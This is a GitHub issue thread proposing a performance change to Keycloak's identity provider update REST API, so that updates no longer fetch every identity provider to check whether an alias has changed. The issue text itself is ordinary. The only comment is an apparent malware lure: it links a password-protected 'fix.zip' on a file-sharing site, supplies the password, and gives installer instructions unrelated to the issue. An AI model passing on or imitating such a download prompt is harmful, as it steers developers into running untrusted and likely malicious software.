### ISSUE TITLE
Make update IdentityProvider admin REST API more efficient.

### ISSUE THREAD

**Issue by cgeorgilakis** [keycloak/keycloak#32388]
### Description

Keycloak try to improve Identity Providers performance with [Benchmark Identity Providers epic](https://github.com/keycloak/keycloak/issues/32229).
We propose extra changes in update Identity Providers REST API for better performance in an environment with thousand of Identity Providers.
In method updateIdpFromRep, code get all Identity Providers ( method getAliasByInternalId ) to set internalid and find if alias has been changed. This could be happen based on identityProviderModel object containing current Identity Provider instance.

### Motivation

[Benchmark Identity Providers epic](https://github.com/keycloak/keycloak/issues/32229)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
